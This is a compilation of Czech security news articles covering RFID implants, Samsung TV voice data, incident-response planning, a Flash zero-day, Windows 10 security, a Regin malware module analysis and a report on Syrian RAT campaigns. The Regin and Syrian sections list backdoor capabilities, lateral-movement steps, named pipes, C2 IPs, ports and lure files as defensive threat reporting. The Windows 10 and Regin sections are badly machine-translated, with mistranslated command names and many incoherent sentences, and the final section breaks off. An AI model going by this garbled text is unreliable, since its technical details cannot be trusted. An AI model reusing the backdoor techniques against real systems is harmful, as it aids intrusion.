Cílem projektu Bionyfikenu je vytvořit komunitu minimálně sta lidí s NFC implantáty, která bude technologii testovat a experimentovat s možnostmi jejího využití. Účastníci projektu za své implantáty musejí zaplatit.

„Čipy je snadné implantovat i odstranit. Jejich životnost je dlouhá. Očekávám, že ten můj vydřží minimálně deset let. Do té doby však budu nejspíše chtít nový model.“ Podle Sjoblada je implantování RFID čipu věcí každého jedince. „Já osobně si však myslím, že chytré implantáty jsou technologií budoucnosti,“ dodal Sjoblad. Ne všichni však souhlasí s tím, že implantace čipu pod kůži je dobrý nápad.

Podle Johna Kindervaga ze společnosti Forrester Research jsou RFID implantáty jednoduše „děsivé“, jelikož představují obrovskou hrozbu. I když jsou RFID/NFC čipy pasivní a aktivují se až jakmile se člověk dostane na několik centimetrů k elektronické čtečce, čtečka může být jednoduše "hacknuta" a z čipu mohou být vytažena citlivá osobní data. Zloději mohou navíc čtečky umístit tam, kde je nikdo nebude čekat a krást data bez vědomí uživatelů.

Na druhou stranu podle Sjoblada mají implantáty potenciál zvýšit efektivitu a zjednodušit provádění úkonů. RFID čipy jsou již využívány v klíčích k automobilům a v členských kartách a používají se také k ukládání hesel a PIN kódů pro přihlašování do smartphonů, tabletů a počítačů.

„To je však začátek. Věřím, že během jednoho či dvou let bude možné díky těmto čipům cestovat hromadnou dopravou. Provádět platby pomocí těchto implantátů pak bude možné do dvou let,“ uvedl Sjoblad. „Během tří let by pak implantáty mohly nahradit fitness trackery. A i to je pořád ještě začátek.“


Odposlechy chytrých televizí? Samsung reaguje na obvinění

12.2.2014 Hrozby
Samsung poté, co se objevily zprávy o tom, že jeho chytré televizory odposlouchávají konverzace svých uživatelů, vydal oficiální prohlášení, v němž fungování své služby přirovnává k aplikaci Siri od Apple.

Na počátku tohoto týdne se objevily zprávy o tom, že chytré televizory Samsungu mohou uživatele v jejich obývacích pokojích "odposlouchávat" a odesílat sesbíraný obsah třetím stranám.

„Mějte prosím na vědomí, že mezi informacemi, které se zaznamenávají a odesílají třetí straně, mohou být i vaše osobní nebo citlivé informace,“ píše Samsung v podmínkách uživání svých chytrých televizorů.

„Třetí stranou“ má Samsung podle všeho na mysli firmu Nuance, která vyvíjí jeho software určený pro rozpoznávání hlasu. Jelikož není jméno Nuance v podmínkách užívání služby Samsungu nijak výslovně zmíněno, vzbuzuje všal tato obecná formulace řadu otázek.

I když někteří experti již mluvili o paralele s Velkým bratrem zmíněným v knize 1984 od George Orwella, Samsung se brání, že takto to určitě není. Samsung v oficiálním prohlášení uvedl, že otázky týkající se ochrany soukromí, bere „velmi vážně“ a o ochranu uživatelských dat se proto stará hned několik systémů.

V prohlášení dále stojí, že chytré televizory Samsungu opatřené funkcí rozeznávání hlasu (pomocí níž lze například přepínat kanály) musejí odesílat hlasová data třetí straně tak, aby tato byla převedena na text a následně byla odeslána opět televizoru. Chytrý televizor Samsungu tak v tomto ohledu funguje stejně, jako třeba hlasová asistentka Siri u zařízení od Apple.

Samsung navíc podotkl, že jeho funkce rozeznávání hlasu je volitelná a lze ji kdykoli vypnout v nastavení. Pokud uživatelé budou mít o své soukromí opravdu velký strach, mohou své televizory navíc odpojit od bezdrátové sítě.

„Pokud uživatelé funkci hlasového odposlechu zapnou, mezi odesílaná data budou patřit pouze pokyny určené televizoru nebo hledání, která provádějí v zabudovaném vyhledávači,“ dodal Samsung.

S informací o tom, že chytré televizory Samsungu mohou odposlouchávat své uživatele, přišel britský portál BBC. Jak však BBC podotýká, podobné problémy měly v minulosti i jiné společnosti.

Například v roce 2013 bezpečnostní experti informovali o tom, že informace o návycích uživatelů mohou shromažďovat televizory LG. LG následně vydalo nový firmware, který uživatelům umožnil vybrat si, zda chtějí uživatelé svá data s firmou sdílet nebo ne.


Zajištění bezpečnosti vyžaduje stálé změny – nezapomeňte na tyto

8.2.2015 Bezpečnost
Plán odezvy na bezpečnostní incidenty je potřeba aktualizovat. Žádný plán, zvláště v ochraně dat, totiž není vytesaný do kamene.

Manažeři bezpečnosti vždy vytvářejí k procesům a plánům nějakou dokumentaci. Je to úkol bez reálného konce, protože se musí každou chvíli oprašovat a přemýšlet o možnostech aktualizace příslušných reakcí. Také potřeby organizace se neustále mění a stejně je tomu i u technologií – takže to, co bylo ještě před pár lety skvělým řešením, může mít v současné době už vážné nedostatky.

To byl i případ našeho plánu reakcí na incidenty. Nedávno jsem měl důvod ho zkontrolovat a zjistil jsem, že jednoznačně vyžaduje nějakou modernizaci.

Během let jsem se naučil, že tyto plány není dobré vytvářet úplně od nuly. Když vytváříte bezpečnostní program podle standardu, je pravděpodobnější, že při auditu obstojíte, protože bude mít podobu, která je v rámci oboru známá a akceptovaná.

Základ od expertů

To je důvod, proč jsem se rozhodl jako náš výchozí bod použít doporučení reakcí na incidenty, který vypracovala agentura NIST (National Institute of Standards and Technology). Každá organizace bude samozřejmě chtít svůj plán přizpůsobit pro své vlastní potřeby, ale vybudovat ho na základě široce používané a solidní struktury může být velkou pomocí do začátku.

S využitím doporučení NIST jsme rozdělili náš proces reakcí na bezpečnostní incidenty do čtyř fází: příprava, detekce a analýza, omezení a vymýcení a konečně analýza po incidentu.

Příprava je v mnoha směrech nejdůležitější částí. Zahrnuje určení členů krizového akčního týmu CAT (Crisis Action Team). Kromě zástupců z oblasti zabezpečení informací jsme v týmu CAT chtěli mít také inženýry znalé platforem Windows a Unix, síťové techniky, personál linky technické podpory a také právníky.

Po výběru těchto lidí jsme si sehnali jejich úplné a záložní kontaktní informace, abychom měli jistotu, že se s nimi dokážeme spojit při výskytu nějakého incidentu. Potom jsme určili některé konferenční místnosti, aby sloužily jako velitelská centra, a zabezpečili jsme pro ně vyhrazenou příchozí telefonní linku a e-mailový distribuční seznam.
 

V této fázi jsme také udělali souhrn všech relevantních nástrojů, které bychom mohli potřebovat k detekci incidentů a reakci na ně včetně zachytávání paketů, analýzy malwaru a systémů pro sledování událostí a také forenzních nástrojů. Nakonec jsme zjistili důvěryhodné třetí strany, kterým bychom mohli zavolat v případě, že bychom potřebovali pomoc nějakého experta.

Nikdy nemůžete vědět, jak se bude bezpečnostní incident vyvíjet. S tím na mysli jsme se ve fázi detekce a analýzy nepokoušeli vyjmenovat všechny možné scénáře. Namísto toho jsme udělali seznam obvyklých událostí, které považujeme za největší hrozby. Patří mezi ně napadení malwarem, phishingové útoky, neautorizovaný přístup, ztráta dat, útoky odepřením služby a krádež.

Akční tým „v akci“

Stanovili jsme také druhy událostí, které by měly vyvolat aktivaci týmu CAT. Například infekce jednoho počítače malwarem pro to nestačí, ale detekce malwaru, který se rychle šíří, už by mohla vyžadovat plnou odezvu týmu CAT. Abychom dokázali zodpovědně rozhodnout o nutnosti povolat naši bezpečnostní kavalerii, vytváříme matici pro záznam kritérií pro eskalaci problémů.

Pro třetí fázi – omezení a vymýcení – vytváříme pokyny k tomu, zda událost vyžaduje shromažďování důkazů, hodnocení škod a identifikaci útočníků. Připravujeme také kontrolní seznamy, jejichž cílem je zajistit řádné vymýcení, případně omezení libovolné škodlivé aktivity incidentu. Kontrolní seznam může například řešit, co dělat, když dojde ke kompromitaci serveru se systémem Windows.

A konečně pro fázi „po incidentu“ popisujeme, jak zajistit shromáždění všech informací, jež jsou potřeba k podání trestního oznámení či jiného správního řízení, a přidáváme doporučení pro následné analýzy, abychom dokázali identifikovat to, co fungovalo dobře, a to, co je třeba zlepšit.

Jakmile bude dokument pro odezvy na incidenty kompletní, zahájíme plánování školení a pravidelně budeme plán i testovat, abychom si udrželi jistotu, že dokážeme efektivně reagovat na jakýkoli incident.


Flash Player obsahuje kritickou chybu, už třetí během měsíce

3.2.2015 Zranitelnosti
Společnost Adobe Systems varovala uživatele před hackery, kteří zneužívají zranitelnost ve Flash Playeru, pro niž zatím není dostupná žádná záplata, k infikaci systémů škodlivým červem.

Jde již o třetí tzv. zero day zranitelnost ve Flash Playeru, o níž Adobe během uplynulých třiceti dnů informovalo. Podle dostupných informací je nová chyba aktivně zneužívána hackery, kteří cílí na uživatele s webovými prohlížeči Internet Explorer a Mozilla Firefox na Windows 8.1 a nižším. Podle oficiálního vyjádření Adobe bude záplata pro Flash Player vydána ještě v tomto týdnu.

Zranitelnost, která je označována jako CVE-2015-0313, postihuje Flash Player na všech podporovaných platformách: Adobe Flash Player 16.0.0.296 a starší verze na Windows a Mac OS X a Adobe Flash Player 11.2.202.440 a starší verze pro Linux.

Podle Adobe na chybu upozornili experti ze společností Trend Micro a Microsoft, kteří zjistili, že je zneužívána k útokům.

Zranitelnost je zneužívána tak, že se uživateli zobrazí podvodná reklama ve Flashi. Pokud na ni uživatel klikne, je jeho počítač infikován. Podle expertů z Trend Micro se tyto reklamy objevují například na populárním webu pro sdílení videí dailymotion.com.

„Je pravděpodobné, že útok nebude cílen pouze na webovou stránku Dailymotion, jelikož infekce pochází z reklamní platformy, ne z obsahu webové stránky jako takové,“ uvedl Peter Pi z Trend Micro. „Útoky sledujeme od 14. ledna,“ dodal Pi s tím, že většina postižených uživatelů pochází ze Spojených států.

Adobe v uplynulých dvou týdnech vydalo pro Flash Player dvě aktualizace: Flash Player 16.0.0.287 a 16.0.0.296, které opravují dvě zranitelnosti ve Flash Playeru aktivně zneužívané hackery. Podpora těchto dvou chyb označovaných jako CVE-2015-0310 a CVE-2015-0311, byla přidána do hackerského nástroje s názvem Angler Exploit Kit. Z analýzy Trend Micro vyplývá, že při útocích pomocí Angleru je využíván i CVE-2015-0313.

Podle nezávislého odborníka, který na internetu vystupuje jako Kafeine, však útočníci nejnovější díru ve Flash Playeru zneužívají také pomocí nástroje Hanjuan Exploit Kit. Ať už je díra zneužívána kterýmkoli nástrojem, uživatelé by si před tím, než Adobe vydá záplatu, měli dávat pozor.

Podvodné reklamy je obtížné blokovat, jelikož jsou zobrazovány skrze legitimní reklamní platformy a na populárních webových stránkách, kterým uživatelé věří.

Uživatelé by si ve svých prohlížečích měli zapnout funkci "click-to-play", která zabrání automatickému spuštění Flashe bez jejich souhlasu a kromě toho by měli udržovat aktualizované i své antivirové systémy.


Windows 10 Preview a bezpečnost
1.2.2015 Bezpečnost

Microsoft představil ukázku jejich nejnovější "zkušenosti", Windows 10, přes live stream dnes ráno. Vydání se očekává, že v průběhu letošního roku. Nejedná se představil jen jako OS pro stolní počítače, ale to přináší podporu jako skutečně široký výpočetní platformy. Tvrdí, že si vybudovali systém Windows 10 se "více osobních počítačů" na mysli, a to je ambiciózní tlačit do hladce spojuje s desktopy, holografické výpočetní (awesome !!!), mobilní zařízení, hraní her a internetu věcí, přesun do "Store ", aplikace produktivity, velké datové služby a sdílení, nové hardware partnerské technologie a cloud computing pro" mobilitu zkušenosti ". Oni odstředěné přes "Důvěra", pouze s ohledem na otázky ochrany osobních údajů. Z toho, co jsem viděl, odstrčil bezpečnosti je poněkud zklamáním téma pro všechny prodejců na jejich náhledy, ne jen Microsoft. Tam je, nicméně, velmi dlouhý seznam vylepšených bezpečnostních prvků vyvinutých do tohoto nového základním kódu spolu s masivním množstvím nových napadení zavedené s touto novou platformou.

Microsoft se snaží lépe utáhněte novou verzi systému Windows operačního systému tím, že zamítne nedůvěryhodných aplikací z instalaci a ověření jejich důvěryhodnost svým digitálním podpisem. Tento důvěryhodný modelu podpis je zlepšení, nicméně, tento aktivní manipulace není dokonalá. APT jako útoky Winnti je na hlavních obchodů rozvoje a jejich více, dalších významných probíhajících projektů útoku ukazují, že digitální certifikáty jsou snadno ukraden a znovu použít při útocích. Nejen winnti útoky jejich základní skupiny, ale certifikáty jsou distribuovány po celém mnoha APT herci, sdílení těchto vysoce oceňují aktiva, rozbití modelu s věřit, se podporovat jejich úsilí špionáže.

S bezproblémovou integraci všech těchto údajů pro sdílení služeb v rámci výpočetních zdrojů, ověřování a souvisejících pověření a žetony nelze úniku přes služeb, aplikací a zařízení. Pass-the-hash útočné techniky často používané cílenými útočníky straší firemní organizace používající Windows téměř deset let. Tyto typy pověření technik krádeži budou muset být lépe chráněni před. A Flame představil celou novou úroveň pověření útoku , takže můžeme vidět Hyper-V a nejnovější model kontejneru pro systém Windows 10 zaútočil na získání přístupu k zneužívání těchto prvků pro boční pohyb a přístup k datům. Obranné snahy nebyly strašně úspěšný v jejich schopnost reagovat v minulosti, a Active Directory pokračuje vidět nové útoky na ověřování celou organizaci s "kostry tlačítek". Takže, jejich realizace pověření rezerv a přístupového tokenu zacházení zaslouží 'pozornost - Hyper-V technologie a komponenty "Bezpečnostní výzkumníci útoku přijde pod novým zaměřením pro nadcházející roky. A implementace DLP pro sdílení firemních dat je pevně povzbudivé také, ale jak silný může být v rámci energetické omezen mobilní hardware?

Vzhledem k tomu, že 2014 přinesl s sebou více než 200 patch-hodné zranitelností pro různé verze aplikace Internet Explorer, minimalistické aktualizaci tohoto kódu s prohlížečem "Project Spartan", by byla vítána. Jednoduše řečeno, webový prohlížeč IE byl kladivem v roce 2014 na všech platformách Windows, včetně jejich poslední. Naše AEP a další technologie byly chrání proti využití těchto zranitelností ve vysokém objemu minulý rok. Nejen její model, kterým se provádí ActiveX komponenty a jeho design byl pod silným přezkumu, ale zabil novější kódu a funkčnosti, umožňující "use-after-free" zranitelnosti vedly ke kritickému vzdálenému spuštění kódu. Nový Spartan prohlížeč s sebou přináší velké množství nového kódu pro komunikaci a sdílení dat, což s sebou přináší Microsoft historii zavedení stovky záplat-hodné zranitelností každoročně do svého prohlížeče kódu. Doufejme, že jejich tým nepřinese že zavazadla s nimi, ale zatížení zdá docela těžký s novými funkcemi. Neviděl jsem žádné nové bezpečnostní funkce, vývojové postupy, nebo karantény popsané pro něj a bude čekat, aby viděli, co je v obchodě zde.

Spartan-2

Neobvykle velké množství času, byla odložena, aby předložily své "inteligentní asistent" Cortanu, která začala s poněkud odpojené a bizarní rozhovor mezi moderátorem a skutečným Cortana asistent například na pódiu. Ďábel je v detailech při provádění podpory zabezpečení pro přístup k datům přes poměrně nepředvídatelné služeb, jako je tento.

Samozřejmě, že naše výrobky je připraven jít. Kaspersky Lab spotřebního zboží bude podporovat Windows 10 po jeho oficiálním zahájením. Bude existovat žádná potřeba pro zákazníky přeinstalovat řešení společnosti Kaspersky Lab pro migraci na novou platformu. Všechny tyto produkty budou podle toho oprava a bude poskytovat stejnou výjimečnou úroveň ochrany na novém operačním systému Windows.


Analýza Regin je peklo a Legspin
1.2.2015 Viry

Při vysokých hrozby profilu, jako je Regin , chyby jsou neuvěřitelně vzácné. Nicméně, pokud jde o lidi psaní kódu, některé chyby jsou nevyhnutelné. Mezi nejzajímavější, co jsme pozorovali v malware provozu Regin byly zapomenutého codenames pro některé ze svých modulů.

Jedná se o:

Peklo
Legspin
Willischeck
U_STARBUCKS
Rozhodli jsme se analyzovat dvě z těchto modulů podrobněji - peklo a Legspin .

I přes celkovou propracovanost (a někdy dokonce i více než-inženýrství) platformy Regin, tyto nástroje jsou jednoduché, přímočaré a poskytují interaktivní konzole rozhraní pro operátory Regin. To, co z nich dělá zajímavý je fakt, že byly vytvořeny před mnoha lety, a dokonce byly vytvořeny před platformě Regin sám.

Modul Hopscotch

MD5 6c34031d7a5fc2b091b623981a8ae61c
Velikost 36864 bytů
Typ Win32 EXE
Sestaveno 2006.03.22 19:09:29 (GMT)
Tento modul má další binární uvnitř, uložený jako zdroj 103:

MD5 42eaf2ab25c9ead201f25ecbdc96fb60
Velikost 18432 bytů
Typ Win32 EXE
Sestaveno 2006.03.22 19:09:29 (GMT)
Tento spustitelný modul byl navržen jako samostatný interaktivní nástroj pro boční pohyb . Neobsahuje žádné hrdinské činy, ale místo toho spoléhá na již dříve získaných pověření k ověřování sám na vzdáleném počítači s použitím standardních API.

Modul přijímá název cílového počítače a volitelně název vzdáleného souboru ze standardního vstupu (operátora). Útočníci si mohou vybrat z několika možností v době uzavření a nástroj poskytuje čitelné odpovědi a návrhy na možnou vstupu.

Zde je příklad "peklo" běžící uvnitř virtuálního stroje:

Mechanismus autentizace (SU nebo NETUSE) [S] / N:
Pokračovat? [N]:
Soubor stejného jména byl již na vzdáleném počítači - ne mazání ...
Modul lze použít dva postupy pro ověřování se v cílovém počítači: buď připojení ke standardní sdílené s názvem "IPC $" (metoda zvaná "NET USE"), nebo přihlášení se jako místní uživatel ("SU", nebo "user switch" ), který má dostatečná práva k případné další akce.

To pak extrahuje užitečného zatížení spustitelný soubor ze svých zdrojů a zapíše jej do umístění v cílovém počítači. Výchozí umístění pro užitečné zatížení je: \\ % cíl% \ ADMIN $ \ System32 \ SVCSTAT.EXE . Po úspěšném se připojuje k Service Manager vzdáleného stroje a vytvoří novou službu s názvem "Service Control Manager" spustíte užitečné zatížení. Služba je začal okamžitě a pak se zastavil a po uplynutí jedné sekundy provedení.

Modul vytváří obousměrný šifrovaný komunikační kanál s dálkovým užitečného zatížení SVCSTAT.EXE pomocí dvou pojmenované kanály. Jedním z potrubí se používá, aby předal informace od operátora do užitečného zatížení a dalších zapisuje data z užitečného zatížení na standardní výstup. Data jsou šifrována pomocí algoritmu RC4 a počáteční výměna klíčů je chráněn pomocí asymetrického šifrování.

\\%target%\pipe\{66fbe87a-4372-1f51-101d-1aaf0043127a}
\\%target%\pipe\{44fdg23a-1522-6f9e-d05d-1aaf0176138a}
Po dokončení nástroj odstraní vzdálený soubor a zavře ověřené zasedání, účinně odstraní všechny stopy na operaci.

Užitečné zatížení Modul SVCSTAT.EXE zahajuje svou kopii v procesu Dllhost.exe a pak připraví odpovídající pojmenované kanály na cílovém počítači a čeká na příchozí data. Jakmile je původní modul se připojuje na trubku, se nastaví šifrování komunikace potrubí a čeká na příchozí shell kódu.

Spustitelný je vstřikován v novém procesu Dllhost.exe nebo svchost.exe a popraven, se jeho vstupní a výstupní madla přesměrováni na vzdálené plugin, který inicioval útoku. To umožňuje obsluze ovládat vstřikovaného modul a komunikovat s ním.

Legspin modul

MD5 29105f46e4d33f66fee346cfd099d1cc
Velikost 67584 bytů
Typ Win32 EXE
Sestaveno 2003.03.17 08:33:50 (GMT)
Tento modul byl také vyvinut jako samostatný příkazového řádku nástroje pro správu počítače. Při spuštění na dálku se stává mocným backdoor. Stojí za zmínku, že program má plnou podporu konzoly a funkce barevného výstupu při spuštění lokálně. To může dokonce rozlišovat mezi konzolemi, které podporují Windows Console API a TTY kompatibilní s terminály, které přijímají escape kódy pro zbarvení.

regin2_1

"Legspin" výstup v okně standardní konzole s barevným zvýrazněním

Kromě časové razítko kompilace nalezené v záhlaví PE, existují dva odkazy, které ukazují do roku 2003 jako jeho skutečné rok sestavení. Program vytiskne dvě verze štítky:

2002-09-A, označovanou jako "lib verzi"
2003-03-
Kromě toho program používá funkce starší API, jako "NetBIOS", která byla představena v systému Windows 2000 a zastaralé v systému Windows Vista.

Poté, co začal a inicializaci poskytuje obsluze interaktivní příkazového řádku, čeká na příchozí příkazy. Seznam dostupných příkazů, je docela velký a umožňuje operátorům vykonávat mnoho správní opatření. Některé příkazy vyžadují dodatečné informace, které jsou požadované od operátora, a příkazy poskytují textový popis dostupných parametrů. Program je vlastně administrativní skořápka, která je určena pro provoz ručně útočníkem / uživatele.

Příkaz Popis
CD Změňte aktuální pracovní adresář
dir
ls
dirl
dirs Seznam souborů a adresářů
dehet Najít soubory odpovídající dané masky a časové rozmezí, a zapsat jejich obsah archív XOR šifrována
strom Vytiskněte strom adresáře pomocí pseudographics
regin2_2
odpadky Přečtěte si a vytisknout obsah "Recycle Bin" adresář Windows
dostat Načíst libovolný soubor z cílového počítače, LZO komprimovaný
dát Nahrajte libovolný soubor do cílového počítače, LZO komprimovaný
del Odstranění souboru
ren
mv
copy
cp Kopírování nebo přesunutí souboru do nového umístění
GTM Získejte vytváření souborů, přístup psát časová razítka a pamatovat si hodnoty
STM Set vytvoření souboru, přístup, napište časová razítka na dříve získaných hodnot
MTM Upravte dříve načtené souboru časová razítka
prohledávání
řetězce Najít a vytisknout všechny čitelné řetězce z daného souboru
více Vytiskněte si obsah libovolného souboru
přístup Načíst a vytisknout DACL záznamy souborů a adresářů
audit Načíst a vytisknout Sací záznamy souborů a adresářů
finfo Načíst a vytisknout informaci o verzi z daného souboru
cs Dump prvních 10.000 bytů z libovolného souboru, nebo z několika systémových souborů:
advapi32.dll
kernel32.dll
msvcrt.dll
ntdll.dll
ntoskrnl.exe
win32k.sys
cmd.exe
ping.exe
ipconfig.exe
tracert.exe
netstat.exe
net.exe
user32.dll
gdi32.dll
shell32.dll

lnk Hledání LNK souborů, analyzovat a tisknout jejich obsah
info Vytiskněte si obecné informace o systému:
Typ CPU
Stav paměti
Název počítače
Čísla verzí Windows a Internet Explorer
Cesta instalace Windows
Codepage
dl Vytisknout informace o discích:
Typ
Volný / používá místo
Seznam oddílů, jejich typy souborových systémů
ps Seznam všech běžících procesů
logdump Nedokončený, zobrazí pouze popis parametru
reglist Dump informace z registru o místní nebo vzdálené úlu
windows Výčet všech dostupných počítačů a všech otevřených oken
pohled Seznam všech viditelných serverů v doméně
domény Seznam řadiče domény v síti
akcie Seznam všech viditelných akcie sítě
regs Vytisknout další informace o systému z registru:
IE verze
Outlook Express verze
Přihlašovací výchozí uživatelské jméno
Datum Instalace systému
Datum systému BIOS
Frekvence procesoru
Kořenový systém adresář
ips Seznam informace síťový adaptér:
DHCP / static IP adresa
Adresa výchozí brány
doba Získejte aktuální čas z místního nebo vzdáleném počítači
kdo Seznam jména současných uživatelů a domén přístupné strojem
net
nbtstat
tracert
ipconfig
netstat
ping Spusťte odpovídající systémový nástroj a vytisknout výsledky
tel Připojte se k danému TCP portu hostitele, poslat řetězec od operátora, vytisknout odpověď
DNS
Arps Vyřešit hostitele pomocí DNS nebo ARP požadavky
Uživatelé Seznam informace o všech uživatelských účtů
Správci Seznam informace o uživatelských účtů s administrátorskými právy
skupiny Seznam informací o uživatelských skupin
věří Seznam informací o uživatelských účtech mezidoménové důvěry
balíčky Tisk názvy instalovaných softwarových balíků
sharepw Spustit brute-force útok přihlášení se snaží získat hesla vzdálené sdílené
sharelist Připojení ke vzdálené sdílené
srvinfo Získat aktuální informace o konfiguraci pro zadaný serveru
netuse Připojit odpojte nebo seznamu Síťové akcie
NetShare Vytvořit nebo odstranit sdílené síťové složky v aktuálním počítači
nbstat Seznam NetBIOS LAN adaptéru
běh Vytvořit proces a přesměrovat svůj výstup na provozovatele
systém Spusťte libovolný příkaz pomocí WinExec API
výjezd Ukončení programu
sada Nastavit různé interní proměnné použité v ostatních příkazů shellu
su Přihlaste se jako jiný uživatel
zabít Ukončit proces jeho PID
kpinst Upravit hodnotu registru: [HKLM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon] systém Tato hodnota by měla normálně přejděte na "lsass.exe".

SVC
DRV Vytvořit, upravit nebo odstranit systémové služby
pomoct
? Tisk seznamu podporovaných příkazů
Legspin modul jsme zpět nemá vestavěný C & C mechanismu. Namísto toho se spoléhá na platformě Regin přesměrovat vstup konzole / výstup do / z operátorů.

Závěry

Na rozdíl od většiny ostatních modulů Regin, Legspin a Hopscotch se zdají být samostatná nástroje vyvinuté mnohem dříve. Legspin backdoor zejména se datuje do roku 2003 a možná i 2002. To je třeba zdůraznit, že ne všechny nasazení Regin obsahovat Legspin modul; Ve většině případů, útočníci spravovat své oběti prostřednictvím dalších funkcí Regin platformy.

To znamená, že Legspin mohly být použity nezávisle na platformě Regin, jako jednoduchý backdoor spolu s vstupní / výstupní obalu.

I když více informací o Regin jsou stále k dispozici, je stále hodně, že zůstává neznámý. Jedna věc je již jasné - co víme o Regin se pravděpodobně již v důchodu informace, které byly nahrazeny novými moduly a techniky, jak plyne čas.


Syrská malware Část 2: Kdo je Joe?
1.2.2015 Viry
Úvod

Kaspersky Lab by chtěl upozornit uživatele na Blízkém východě pro nové útoky škodlivého softwaru dodávána prostřednictvím syrské novinkách a fórech sociálních sítí. Malware spisovatelé používáte více technik dodat své soubory a lákat oběti na jejich spuštění, vytvoření efektivního infekce vektor. Hlavně v závislosti na sociální inženýrství, útočníci využívají důvěru obětí v fórech sociálních sítí, zvědavost v následujících novinky týkající se konfliktu v Sýrii, jejich postavení v Sýrii, kromě nedostatku Cyber ​​Security vědomí. Poté, co zločinci infikovat počítač oběti, útočníci mají plný přístup a kontrolu nad zařízením oběti.

V první zprávě o syrské malware , Kaspersky Lab podrobně mnoho útoků se používá v Sýrii špehovat uživatele, zpráva obsahuje útoky z různých týmů a mnoho zdrojů.

Tento příspěvek navazuje na jednu z oblastí, zdánlivě nejvíce aktivní v poslední době: thejoe.publicvm.com

Malware soubory byly nalezeny na aktivistických stránkách a fórech sociálních sítí, jiné byly hlášeny regionálních organizací, jako je CyberArabs .

Zprávy, které zmiňují " Joe"
https://citizenlab.org/2013/06/a-call-to-harm/
https://www.eff.org/files/2013/12/28/quantum_of_surveillance4d.pdf

Všechny soubory schovat pod kapotou plnohodnotnou variantu RAT, Vzdálená správa Trojan (Bitfrose / NjRAT / Shadowtech / Darkcomet ...), které jsou schopné získat plnou kontrolu nad obětí strojů a zařízení, sledování jakýkoli pohyb a přístup ke všem souborů , Thejoe.publicvm.com doména se vztahuje na mnoho vzorků, zde se zaměříme na nejdůležitější a láká, že s největší pravděpodobností shromáždí nejvyšší počet cílených obětí, který se odhaduje na tisíce.

Existuje mnoho faktorů, a subjektům, které ve hře v tomto případě se zaměříme pouze na malware a skutečností, které byly nalezeny při analýze, prezentuje pouze relevantní informace, v naději, že stanovení jasné kontext pro tento výzkum.

Co je to informace, které měla na theJoe?
Co Joe dělal v poslední době?
Kdo je Joe?

Co je to informace, které měli na Joe?

Joe je jedním z nejaktivnějších počítačoví zločinci v Sýrii a na Blízkém východě, zaměřené na všechny typy uživatelů, je následující údaje shromážděné na Joe a jeho činnosti.

Informace o Domain "thejoe.publicvm.com"

Joe používá dynamické domény, aby bylo možné změnit jeho IP adresu a udržet anonymitu:
thejoe.publicvm.com doména byla pozorována za použití následujících IP adresy v Sýrii a Rusku:

31.9.48.146
31.9.48.119
31.9.48.146
31.9.48.80
31.9.48.78
31.9.48.119
31.8.48.7
TCP porty používané při útocích: 1234, 1177, 5522.

Malware informace

Ze vzorků malwaru odebraných, jsme byli schopni najít řetězce v kódu, ze zařízení se systémem Windows používané Joe.

Cesty složky zpět z malware soubory:

C: \ Users \ jan \ Desktop \ 2014 \ WindowsApplication1 \ WindowsApplication1 \ obj \ Debug \ WindowsApplication1.pdb
C: \ Users \ jan \ Desktop \ Desktop \ Syriatel \ Syriatel \ obj \ Debug \ Syriatel.pdb
C: \ Users \ jan \ Desktop \ NJServer \ NJServer \ obj \ Debug \ NJServer.pdb
Youtube kanálu

Joe se také používá falešnou youtube kanálu, kde se příspěvky technické videa sociálního s odkazy ke stažení malware.

http://www.youtube.com/channel/UCCdoQBw-a6dM15ZyhrsqW_w

Kanál je šíření škodlivého softwaru souborů pod názvem "Lions revoluce", nebo jiné ...

Co se Joe dělal v poslední době?

Joe byl zaneprázdněn v uplynulém období; V níže jsme se zobrazí některé z nejvíce grafických a láká vzorků shromážděných služby Kaspersky zpravodajských a Security Network (KSN Kaspersky cloud), popisovat jejich funkčnosti a jak Joe je schopen použít k situaci v Sýrii, aby uživatele automaticky otevřené soubory, i když mají podezření infikované. Mezi cílové země jsou Sýrie, Turecko, Libanon a Saúdská Arábie. Počet obětí se odhaduje kolem roku 2000.

6 nové příběhy:

Pojďme opravit SSL zranitelnost
Teď Pojďme vyčistit Skype!
Věděli jste aktualizaci na nejnovější verzi VPN?
Pojďme Zkontrolujte, zda je vaše telefonní číslo je mezi sledovanými čísly
Účet šifrování aplikace Facebook
Jaký je váš oblíbený bezpečnostní produkt?
Joe_1

1 - Pojďme opravit SSL zranitelnost

MD5 Hash: dc6166005db7487c9a8b32d938fec846
souboru: TheSSL.exe, SSL Cleaner.rar

V návaznosti na zranitelná místa v OpenSSL, a množství zpráv dosáhla, se počítačoví zločinci se snaží těžit z uživatelského vnímání takové zprávy, ale nedostatečné povědomí o tom, jak by mohla být slabá místa opravit.

Joe_2

Demonstrace video na Heartbleed zranitelnosti + Odkaz na stažení "Fix" s infekcí

Joe_3
Joe_4
Joe_5

2 - Nyní Pojďme vyčistit Skype!

MD5 Hash: d6ab8ca6406fefe29e91c0604c812ff9
Název souboru: Skype.exe

Další sociální inženýrství trik používá lákat zločince stáhnout a spustit škodlivý soubor, skype čistší "chránit a šifrovat skype komunikace".

Joe_6
Joe_7

3 - jste aktualizaci na nejnovější verzi VPN?

MD5 Hash: 2e07e8622b4e997f6543fc0497452dad
Název souboru: VPN.exe

Psiphon, legitimní aplikace, která využívá po celém světě pro ochranu anonymity, je mimořádně účinný a použity v Sýrii pro uživatele chránit jejich provoz ze špehování, nebo odposlech, aplikace je zde vázán s malware a vydal pro uživatele, jako aktualizovanou verzí.

Joe_8
Joe_9

4 - Pojďme Zkontrolujte, zda je vaše telefonní číslo je mezi sledovanými čísly

MD5 Hash: ad9a18e1db0b43cb38da786eb3bf7c00
Název souboru: Syriatel.exe

Další z populárních malware soubory, se používá k falešný nástroj, který se používá pro kontrolu čísla mobilních telefonů pod dohledem a seřazenou podle místa, dodávaný jako "unikly programu" k obětem.

Joe_10
Joe_11
Joe_12

5 - Účet šifrování aplikace Facebook

MD5 Hash: efdaa73e0ac1b045d5f2214cadd77f09
Název souboru: Rooms.exe

Joe_13
Joe_14

6 - Jaký je váš oblíbený bezpečnostní produkt?

Jedním z posledních souborů použitých infikovat uživatele je zcela odlišný: vazba nástroj Kaspersky Lab s malware. TDSSKiller vyvinutý společností Kaspersky Lab, je výkonný bezplatný nástroj, který dokáže detekovat a odstranit konkrétní seznam rootkit malware rodin.

Bound malwarem, Joe je pomocí názvu Kaspersky dodat malware ve snaze přilákat oběti otevřít a důvěřovat soubory Posílá.

Nástroj KL

Kdo je "Joe"

